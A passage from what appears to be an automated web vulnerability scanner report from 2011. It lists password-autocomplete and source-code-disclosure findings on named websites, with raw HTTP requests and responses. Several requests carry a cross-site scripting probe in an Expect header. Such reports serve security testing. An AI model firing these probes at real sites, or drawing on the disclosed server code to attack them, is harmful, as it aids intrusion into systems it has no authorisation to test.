Content-Length: 46289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Signup for an
...[SNIP]...
<td width=648 valign=top bgcolor=white>


<form action="signup.phtml" method="post">

<input type="hidden" name="back_to" value="http://www.japanator.com/elephant/">
...[SNIP]...
<td><input type="password" name="password" value="">
<br>
...[SNIP]...
<td ><input type="password" name="password2" value="">
<br>
...[SNIP]...
18.13. http://www.mrsdash.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mrsdash.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrsdash.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:08:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=af4qxtezlapjev55htmjv345; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Pag
...[SNIP]...
<body id="sitemap">
   <form name="frmMain" method="post" action="/404iis.aspx?404;http://www.mrsdash.com:80/favicon.ico" id="frmMain">
<div>
...[SNIP]...
</label>
                       <input name="cTopNav$txtPassword" type="password" maxlength="25" id="cTopNav_txtPassword" onkeydown="setEnterKey('.newMemRegistra', event);" />

                       <label>
...[SNIP]...
</label>
                       <input name="cTopNav$txtConfirmPassword" type="password" maxlength="25" id="cTopNav_txtConfirmPassword" onkeydown="setEnterKey('.newMemRegistra', event);" />

                       
                       <div class="newsletter">
...[SNIP]...
</label>
                       <input name="cTopNav$txtPassword_logn" type="password" maxlength="25" id="cTopNav_txtPassword_logn" onkeydown="setEnterKey('.signinMem', event);" />

                       <p class="more">
...[SNIP]...
18.14. https://www.onlinemicrofiche.com/Electronicpartsfinder/dealerinfo/DealerInfo.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /Electronicpartsfinder/dealerinfo/DealerInfo.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Electronicpartsfinder/dealerinfo/DealerInfo.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: http://www.hlsm.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:29:17 GMT
Content-Length: 5101
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>HLSM Electronic Parts Finder.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family
...[SNIP]...
</p>
<form method="post" action="dealerinfo.asp">
<table width="316" border="1" class="size10">
...[SNIP]...
<td width="225">
<input type="password" name="txtPassword" class="size10" size="30">
</td>
...[SNIP]...
19. Source code disclosure  previous  next
There are 6 instances of this issue:

19.1. http://insurancenewsnet.com/styles/style.css  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://insurancenewsnet.com
Path:   /styles/style.css

Issue detail

The application appears to disclose some server-side source code written in JSP and ASP.

Request

GET /styles/style.css HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pddqwnm3cm5gjqvccrmz1345; INNid=pddqwnm3cm5gjqvccrmz1345

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 10 Feb 2010 19:52:54 GMT
Accept-Ranges: bytes
ETag: "0af61a28aaaca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:02 GMT
Content-Length: 6099

/*
Uncomment this if processing the page as ASP.NET
*/
<%@ Page Language="C#" %>
<% Response.ContentType = "text/css"; %>

/* global elements */

body
{
   margin: 0px;
   padding: 0px;
   background-color: #dadada;
   background-image: url(http://www.insurancenewsnet.com/images/inn_bodybgtry.gif);
   background-repeat:
...[SNIP]...
19.2. http://resources.infolinks.com/js/213/infolinks.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://resources.infolinks.com
Path:   /js/213/infolinks.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/213/infolinks.js HTTP/1.1
Host: resources.infolinks.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/javascript
Date: Mon, 02 May 2011 02:05:27 GMT
ETag: "2a489c-11831-4a0b89d1a0f40+gzip"
Expires: Wed, 01 Jun 2011 02:05:27 GMT
Last-Modified: Tue, 12 Apr 2011 13:24:37 GMT
Server: ECS (dca/5328)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 71729

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...
a","6Y","1E"],9J:"5z",g8:"b5",4g:"b3",6o:"b3",7Y:"5z",6U:["2D","1o"]},6u:{},2k:{},9G:50,c5:{69:0,2M:10,6P:10,7X:50,6a:30,68:0},4z:[],aj:{},ep:"2E://7f.5Y.5C/?kh=bb&lU=lQ",9B:"2E://7f.5Y.5C/lR-3y.4C?5o=<%= bO %>&4j=<%= 4j %>",1N:{8m:1f,8Q:lV,8R:kk,9Q:"4n",9i:5i,id:"kl",7x:1n,1P:1f,3v:1f,2o:1f,dc:{1K:k(K,J){j H=o,N=H.1a,C=N.2k,Q=H.5t(K),T=H.1I,L="3M",B=N.2I,M=N.1N.id,V=Q.1a,F=T.1A&&T.2P()<=6;j U=N.1v[K.1T].1i,R=U.27[J];j O
...[SNIP]...
<%=(.*?)%>/g,"\',$1,\'").2V("<%").1s("\');").2V("%>").1s("o.2f(p,\'");F=["j p=[];l2(4M||{}){o.2f(p,\'",F,"\');}l p.1s(\'\');"].1s("");D=26 l3("4M",F);if(C){H[C]=D}}l D(G)},62:{6j:k(){l 26 3m().3h()},a7:k(B,A){l(A||o.1d.62.6j())-B}},3w:{bL:k(D,C){if(!(C
...[SNIP]...
<1e id="<%= id %>47<%= 3Y %>" 1J="<%= 1p %>" 17="4r:fn 5v 0 <%= 4F ? 6 : 15 %>1w; 1c:<%= 1i.1c-15 %>1w; 1y:4H; 1z:<%= 1z %>;">    <1e 1J="<%= 1p %>" 17="4r:0 0 4m <%= 4F ? 9 : 0 %>1w; 1c:f2;">        <1e 1J="<%= 1p %>" 17="1c:f2; fm-1c:n8; 2s-53:8k; 2s-5Q:5D; 1K-5w:1E; 2c: <%= 1B.55 %>; 2s-9r:bK 9u, 9e, 8h-8c; 1z:n9-na; bc-5A:1k;"><%= ad.55 %></1e>    </1e>    <%if (fy){ %>        <% if(2S.43.3L()){ %>            <7E id="<%= id %>fg" 1J="<%= 1p %>" 17="6t:1o; 5u-1h:aB; 1c:be; 1z:2F; 2J:3Z 3f <%= 1B.8y %>; 4r-2D:7j; <%= 2S.7b(\\\'0 0 5v 0 \\\' + 1B.dL) %>" 2Y="<%= 4f %>" 98=""/>        <% } 1j { %>            <1e 1J="<%= 1p %>" 17="6t:1o; 1h:aB; 1c:be; 3W:2n; 4r:-6N 3T 0 <%= 4F ? 0 : -9 %>1w; 1Q:1C(<%= 3c %>3l.<%= 5e %>) no-2d 2l 0 0 1X;">
...[SNIP]...
<7E id="<%= id %>fg" 1J="<%= 1p %>" 17="<% if(!4F){ %>5u-<% } %>1h:aB; 1c:be; 1K-5A:4y;" 2Y="<%= 4f %>" 98=""/>
...[SNIP]...
<1e 1J="<%= 1p %>" 17="7h:33; 1c:ni; fm-1c:6f; 2s-53:2n; 1K-5w:1E; 2c:<%= 1B.1K %>; 2s-5Q:5D;"><%= ad.1K %></1e>    <1e 1J="<%= 1p %>" 17="<%= 28 %> 2A:2n; 1o:<%= 4F ? 9 : 0 %>1w; 1h:nm; 1c:4Z; 7h:33; 2s-53:2n; 2s-5Q:5D; 1K-5w:2B; 2c:<%= 1B.g6 %>;" 55="<%= ad.7H %>"><%= ad.7H %></1e>    <1e 1J="<%= 1p %> <%= id %>59" 17="<%= 28 %> 2A:fn; 2D:0; 1h:nq; 1c:ns; 3W-1k:3T; 1Q-1y:0 -fs; 1Q-2d:2d-x; 2J:1M 3f <%= 1B.fL %>; <%= 2S.7l(\\\'3T\\\') %> 1K-5A:4y; 2c:<%= 1B.fz %>; 2s-53:2n; 3d:3n; 2s-5Q:5D;" 3C="1g.17.2r=\\\'0 -nu\\\';" 3E="1g.17.2r=\\\'0 -fs\\\';">
...[SNIP]...
<1e                 id="<%= id %>47<%= 3Y %>" 1J="<%= 1p %>" 17="1c:<%= 1i.1c %>1w; 1y:4H; 1z:<%= 1z %>;"><%= 3k %></1e>
...[SNIP]...
<1e                 id="<%= id %>47<%= 3Y %>" 1J="<%= 1p %>" 17="1z:<%= 1z %>;">    <1e 1p="<%= 1p %>" 17="1h:<%= 1i.1h %>1w; 1c:<%= 1i.1c %>1w;">        <2R id="6g<%= 3Y %>" 2m="6g<%= 3Y %>" 2Y="<%= 1G.7c %>" 1h="<%= 1i.1h %>" 1c="<%= 1i.1c %>" an="0" bz="no">
...[SNIP]...
<6r id="<%= id %>8p<%= 3Y %>" 52="9l" 3p="2E://<%= 1G.7K %>/5N.6i" 49="6g<%= 3Y %>" 17="1z:1E;">        <3A 2t="33" 2m="5N" 2q="<%= 3r(3k.2V(\\\'\\\').fU().1s(\\\'\\\')) %>" />        <3A 2t="33" 2m="5o" 2q="<%= 1G.6L %>" />        <3A 2t="33" 2m="4j" 2q="<%= 1G.6O %>" />        <3A 2t="33" 2m="5x" 2q="<%= 1G.3X %>" />
...[SNIP]...
<1e id="<%= id %>" 1J="<%= 1p %>" 17="<%= 28 %> 1k:<%= 1L.5j.1k %>1w; 1o:<%= 1L.5j.1o %>1w; 1h:<%= 1h+12 %>1w; 1c:<%= 1c + (4F ? 58 : 54) %>1w; z-3j:<%= 4w+3 %>;">    <1e id="<%= id %>mU" 1J="<%= 1p %>" 17="<%= 28 %> 1k:<%= 3q == \\\'T\\\' ? 0 : \\\'2n\\\' %>; 1o:0; 1h:<%= 1h+10 %>1w; 1c:<%= 1c+39 %>1w; 2J:1M 3f <%= 1B.eR %>; <%= 2S.7l(\\\'4T\\\') %> <% if (2S.43.87()){ %>1Q-2c:<%= 1B.8y %>; <%= 2S.9S(3q == \\\'T\\\' ? \\\'2A\\\' : \\\'1k\\\', (3q == \\\'T\\\' && 2g(b.4a) >= 89) ? 1c+19 : 22, 1B.eW, 1B.eY) %><% } 1j { %>1Q:1C(<%= 3c %>2Q-b6-bg.<%= 5e %>) 2d-x 2l 0 <%= 3q == \\\'T\\\' ? 1c+19+\\\'1w\\\' : \\\'-n6\\\' %> <%= 1B.8y %>;<% } %> <%= 2S.7b(\\\'0 0 a3 0 #a4\\\') %>" 3C="o.5t(\\\'<%= 1L.id %>\\\').a2(1g, \\\'<%= 1L.id %>\\\');" 3E="o.5t(\\\'<%= 1L.id %>\\\').9O(1g, \\\'<%= 1L.id %>\\\');">        <1e id="<%= id %>nb" 1J="<%= 1p %>" 17="1h: 4S%; 1c: nc; <%= 28 %> <%= 3q == \\\'T\\\' ? \\\'2A:0;\\\' : \\\'1k: 0;\\\' %> 1o: 0; z-3j: <%= 4w+4 %>;">            <a id="<%= id %>ne" 1J="<%= 1p %> <% if (!5s.1C){ %><%= id %>59<% } %>" 35="<%= 5s.bI %>" 49="7T" 17="<%= 28 %> 1z: 2F; 1k: 5h; 1o: 5v; 1h:<%= 5s.1h %>1w; 1c:<%= 5s.1c %>1w; 3d: 3n; <% if (5s.1C){ %>1Q:1C(<%= 5s.1C %>) no-2d 2l 0 0 1X;<% } %>
...[SNIP]...
</a>            <% if (1q 1G.4x == "4G"){ %> <a 17="1y: 3M; 1k: 4m; 2D: fP; 1c: 6f; 2s-5Q: 6F; 2s-9r: bK 9u,9e,8h-8c; 2s-53: 5v; 1K-5w: 2B; 2c: #np;" 1J="bx" 35="2E://7f.5Y.5C/27" 49="7T">
...[SNIP]...
</3D> <% }/*nK*/ %> <1e id="<%= id %>nM" 1J="<%= 1p %>" 17="<%= 28 %> 1k: 6N; 2D: <%= (1q 1G.4x != "4G") ? "fP" : "aS" %>; 1c: 6f; 2s-5Q: 6F; 2s-9r:bK 9u, 9e, 8h-8c; 2c:<%= 1B.9P %>; 2s-53: 6N;"><%= 1i.27[1L.2p].9P || \\\'gm\\\' %></1e>            <% if (2S.43.75()){ %>            <a id="<%= id %>bT" 1J="<%= 1p %> <%= id %>59" 35="<%= bB %>" 49="7T" 17="<%= 28 %> 1k:4m; 2D:c4; 1h:2n; 1c:2n; 1z:2F; 1Q-1y:0 -7R; 2J:1M 3f <%= 1B.6S %>; <%= 2S.7l(\\\'4m\\\') %> <%= 2S.7b(\\\'0 -1M 1M 0 \\\' + 1B.9C) %>" 3C="1g.17.4k=\\\'<%= 1B.9A %>\\\';" 3E="1g.17.4k = \\\'<%= 1B.6S %>\\\';"></a>            <1e id="<%= id %>c1" 1J="<%= 1p %> <%= id %>59" 17="<%= 28 %> 1k:4m; 2D:4T; 1h:2n; 1c:2n; 3d:3n; 1Q-1y:-2n -7R; 2J:1M 3f <%= 1B.6S %>; <%= 2S.7l(\\\'4m\\\') %> <%= 2S.7b(\\\'0 -1M 1M 0 \\\' + 1B.9C) %>" 3U="o.1x.9H(1Z, \\\'<%= 1L.id %>\\\')" 3C="1g.17.4k=\\\'<%= 1B.9A %>\\\';" 3E="1g.17.4k = \\\'<%= 1B.6S %>\\\';"></1e>            <% } 1j { %>            <a id="<%= id %>bT" 1J="<%= 1p %>" 35="<%= bB %>" 49="7T" 17="<%= 28 %> 1k: 5b; 2D: c4; 1h: 4Z; 1c: 4Z; 1z: 2F; 1Q: 1C(<%= 3c %>9F-67.<%= 5e %>) no-2d 2l 0 0 1X; 3d: 3n;" 3C="1g.17.2r=\\\'0 -4Z\\\';" 3E="1g.17.2r = \\\'0 0\\\';">
...[SNIP]...
<1e 1J="<%= 1p %> <%= id %>59" 17="<%= 28 %>
...[SNIP]...
<1e id="<%= id %>c1" 1J="<%= 1p %>" 17="<%= 28 %> 1k: 5b; 2D: 4T; 1h: 4Z; 1c: 4Z; 3d:3n; 1Q: 1C(<%= 3c %>9F-67.<%= 5e %>) no-2d 2l 0 0 1X;" 3U="o.1x.9H(1Z, \\\'<%= 1L.id %>\\\')" 3C="1g.17.2r=\\\'0 -4Z\\\';" 3E="1g.17.2r = \\\'0 0\\\';">
...[SNIP]...
<1e 1J="<%= 1p %> <%= id %>59" 17="<%= 28 %>
...[SNIP]...
<1e id="<%= id %>8u" 1J="<%= 1p %>" 17="<%= 28 %> 1k:<%= 3q == \\\'T\\\' ? 4 : 34 %>1w; 1o:3Z; 1h:<%= 1h %>1w; 1c:<%= 1c %>1w; 2c:<%= 1B.1K %>; 3d: 3n; 2J:1M 3f <%= 1B.cz %>; <% if (2S.43.87()){ %><%= 2S.9S(3q == \\\'T\\\' ? \\\'2A\\\' : \\\'1k\\\', (3q == \\\'T\\\' && 2g(b.4a) >= 89) ? 1c-41 : 41, 1B.cG, 1B.cH) %><% } 1j { %>1Q:1C(<%= 3c %>2Q-1O-bg.<%= 5e %>) 2d-x 2l 0 <%= 3q == \\\'T\\\' ? 1c-41 : -41 %>1w 1X;<% } %>" 3U="o.7B(1Z, o.1d.cO(\\\'<%= 1L.id %>\\\'));">            <%= il.cP(1L, 1i) %>        </1e>    </1e>    <1e id="<%= id %>iV" 1J="<%= 1p %> <%= id %>59" 17="<%= 28 %> 1h: 8k; 1c: 8k; z-3j: <%= 4w+5 %>; 1Q-1y:<%= 3q == \\\'T\\\' ? \\\'-8k -cU;\\\' : \\\'0 -cU;\\\' %>; 1k:<%= 3q == \\\'T\\\' ? 1c+39 : 0 %>1w; <%= fh == \\\'L\\\' ? \\\'2D: 24\\\' : \\\'1o: 24\\\' %>1w;"></1e></1e><% if (!2S.43.3L() && (!b.1A || 2W(b.1A) >= 7)){ %><1e id="<%= id %>bw" 1J="<%= 1p %>" 17="<%= 28 %> 1k:<%= 1L.5j.1k - (3q == \\\'T\\\' ? 37 : 24) %>1w; 1o:<%= 1L.5j.1o-37 %>1w; 1h:<%= 1h+10+74 %>1w; 1c:<%= 1c+39+74 %>1w; z-3j:<%= 4w+1 %>;" <% if (b.3N && 2W(b.3N) < 3.5){ %> 3C="o.5t(\\\'<%= 1L.id %>\\\').a2(1g, \\\'<%= 1L.id %>\\\');" 3E="o.5t(\\\'<%= 1L.id %>\\\').9O(1g, \\\'<%= 1L.id %>\\\');"<% } %>
...[SNIP]...
<1e id="<%= id %>jJ" 1J="<%= 1p %>" 17="<%= 28 %> 1k:0; 1o:0; 1h:4b; 1c:95; 1Q:1C(<%= 3c %>3l.2U) no-2d 2l 0 -88 1X;">
...[SNIP]...
<1e id="<%= id %>jM" 1J="<%= 1p %>" 17="<%= 28 %> 1k:0; 1o:4b; 1h:<%= 1h+10-60 %>1w; 1c:6p; 1Q:1C(<%= 3c %>3l-h.2U) 2d-x 2l 0 0 1X;">
...[SNIP]...
<1e id="<%= id %>jQ" 1J="<%= 1p %>" 17="<%= 28 %> 1k:0; 2D:0; 1h:8B; 1c:95; 1Q:1C(<%= 3c %>3l.2U) no-2d 2l -4b -88 1X;">
...[SNIP]...
<1e id="<%= id %>jV" 1J="<%= 1p %>" 17="<%= 28 %> 1k:95; 1o:0; 1h:6p; 1c:<%= 1c+39-61 %>1w; 1Q:1C(<%= 3c %>3l-v.2U) 2d-y 2l 0 0 1X;">
...[SNIP]...
<1e id="<%= id %>k2" 1J="<%= 1p %>" 17="<%= 28 %> 1k:95; 2D:0; 1h:6p; 1c:<%= 1c+39-61 %>1w; 1Q:1C(<%= 3c %>3l-v.2U) 2d-y 2l -8b 0 1X;">
...[SNIP]...
<1e id="<%= id %>kt" 1J="<%= 1p %>" 17="<%= 28 %> 2A:0; 1o:0; 1h:4b; 1c:8B; 1Q:1C(<%= 3c %>3l.2U) no-2d 2l 0 -8e 1X;">
...[SNIP]...
<1e id="<%= id %>kB" 1J="<%= 1p %>" 17="<%= 28 %> 2A:0; 1o:4b; 1h:<%= 1h+10-60 %>1w; 1c:6p; 1Q:1C(<%= 3c %>3l-h.2U) 2d-x 2l 0 -8b 1X;">
...[SNIP]...
<1e id="<%= id %>kV" 1J="<%= 1p %>" 17="<%= 28 %> 2A:0; 2D:0; 1h:8B; 1c:8B; 1Q:1C(<%= 3c %>3l.2U) no-2d 2l -4b -8e 1X;">
...[SNIP]...
<1e id="<%= id %>e0" 1J="<%= 1p %>" 17="<%= 28 %> 1k:<%= 6T.1k %>1w; 1o:<%= 6T.1o %>1w; 1h:<%= 6T.1h %>1w; 1c:<%= 6T.1c %>1w; z-3j:<%= 4w+6 %>; 3d:3n;" 3C="o.8W(1Z, \\\'<%= 1L.id %>\\\');" 3E="o.9k(\\\'<%= 1L.id %>\\\');" 3U="o.7B(1Z, \\\'<%= 1L.id %>\\\')">
...[SNIP]...
19.3. http://www.allcelebpass.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.allcelebpass.com
Path:   /favicon.ico

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allcelebpass.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:01:29 GMT
Content-Type: text/html
Content-Length: 28521
Last-Modified: Mon, 22 Feb 2010 02:22:23 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

<?php include ("scripts/dte.php")?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml?nats=<?=$_REQUEST['nats']?>">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date1 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date2 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date3 ?> <a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ;">
...[SNIP]...
<div align="center" class="sitename"> <?php echo $date4 ?> <a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date5 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date6 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date7 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date8 ?> <a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date9 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date10 ?> <a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date11 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date12 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date13 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date14 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<div align="center" class="sitename">
<?php echo $date15 ?><a href="http://access.allcelebpass.com/track/OTk5OTAyOjY6MzQ">
...[SNIP]...
<a href="http://www.rabbitsreviews.com/s794/All-Network-Pass.html?nats=<?=$_REQUEST['nats']?>">
...[SNIP]...
<div align="center" class="footer">
           <?php echo file_get_contents("http://tour.allcelebpass.com/information.php?footer") ?>
       </div>
...[SNIP]...
19.4. http://www.ourprayer.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ourprayer.org
Path:   /favicon.ico

Issue detail

The application appears to disclose some server-side source code written in JSP and ASP.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ourprayer.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:41 GMT
Content-Length: 5697

<%@ language="VBScript" %>
<%
Option Explicit

Const lngMaxFormBytes = 200

Dim objASPError, blnErrorWritten, strServername, strServerIP, strRemoteIP
Dim strMethod, lngPos, datNow, strQueryString, strURL

If Response.Buffer Then
Response.Clear
Response.Status = "500 Internal Server Error"
Response.ContentType = "text/html"
Response.Expires = 0
End If

Set objASPError = Server.GetLastError
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
...[SNIP]...
<br>
<%
Dim bakCodepage
on error resume next
   bakCodepage = Session.Codepage
   Session.Codepage = 1252
on error goto 0
Response.Write Server.HTMLEncode(objASPError.Category)
If objASPError.ASPCode > "" Then Response.Write Server.HTMLEncode(", " & objASPError.ASPCode)
Response.Write Server.HTMLEncode(" (0x" & Hex(objASPError.Number) & ")" ) & "<br>"
If objASPError.ASPDescription > "" Then
   Response.Write Server.HTMLEncode(objASPError.ASPDescription) & "<br>"
elseIf (objASPError.Description > "") Then
   Response.Write Server.HTMLEncode(objASPError.Description) & "<br>"
end if
blnErrorWritten = False
' Only show the Source if it is available and the request is from the same machine as IIS
If objASPError.Source > "" Then
strServername = LCase(Request.ServerVariables("SERVER_NAME"))
strServerIP = Request.ServerVariables("LOCAL_ADDR")
strRemoteIP = Request.ServerVariables("REMOTE_ADDR")
If (strServerIP = strRemoteIP) And objASPError.File <> "?" Then
Response.Write Server.HTMLEncode(objASPError.File)
If objASPError.Line > 0 Then Response.Write ", line " & objASPError.Line
If objASPError.Column > 0 Then Response.Write ", column " & objASPError.Column
Response.Write "<br>"
Response.Write "<font style=""COLOR:000000; FONT: 8pt/11pt courier new""><b>"
Response.Write Server.HTMLEncode(objASPError.Source) & "<br>"
If objASPError.Column > 0 Then Response.Write String((objASPError.Column - 1), "-") & "^<br>"
Response.Write "</b></font>"
blnErrorWritten = True
End If
End If
If Not blnErrorWritten And objASPError.File <> "?" Then
Response.Write "<b>" & Server.HTMLEncode( objASPError.File)
If objASPError.Line > 0 Then Response.Write Server.HTMLEncode(", line " & objASPError.Line)
If objASPError.Column > 0 Then Response.Write ", column " & objASPError.Column
Response.Write "</b><br>"
End If
%>
</li>
...[SNIP]...
<br>
<%= Server.HTMLEncode(Request.ServerVariables("HTTP_USER_AGENT")) %>
<br>
...[SNIP]...
<br>
<%
strMethod = Request.ServerVariables("REQUEST_METHOD")
Response.Write strMethod & " "
If strMethod = "POST" Then
Response.Write Request.TotalBytes & " bytes to "
End If
Response.Write Request.ServerVariables("SCRIPT_NAME")
Response.Write "</li>"
If strMethod = "POST" Then
Response.Write "<p><li>POST Data:<br>"
' On Error in case Request.BinaryRead was executed in the page that triggered the error.
On Error Resume Next
If Request.TotalBytes > lngMaxFormBytes Then
Response.Write Server.HTMLEncode(Left(Request.Form, lngMaxFormBytes)) & " . . ."
Else
Response.Write Server.HTMLEncode(Request.Form)
End If
On Error Goto 0
Response.Write "</li>"
End If
%>
<br>
...[SNIP]...
<br>
<%
datNow = Now()
Response.Write Server.HTMLEncode(FormatDateTime(datNow, 1) & ", " & FormatDateTime(datNow, 3))
on error resume next
   Session.Codepage = bakCodepage
on error goto 0
%>
<br>
...[SNIP]...
<br>
<%
strQueryString = "prd=iis&sbp=&pver=5.0&ID=500;100&cat=" & Server.URLEncode(objASPError.Category) & "&os=&over=&hrd=&Opt1=" & Server.URLEncode(objASPError.ASPCode) & "&Opt2=" & Server.URLEncode(objASPError.Number) & "&Opt3=" & Server.URLEncode(objASPError.Description)
strURL = "http://www.microsoft.com/ContentRedirect.asp?" & strQueryString
%>
<ul>
...[SNIP]...
<a href="<%= strURL %>">
...[SNIP]...
19.5. http://www.procuts.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.procuts.com
Path:   /favicon.ico

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.procuts.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 11086
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:52 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<!-- SS_BEGIN_SNIPPET(fragment5,ASP)-->
   
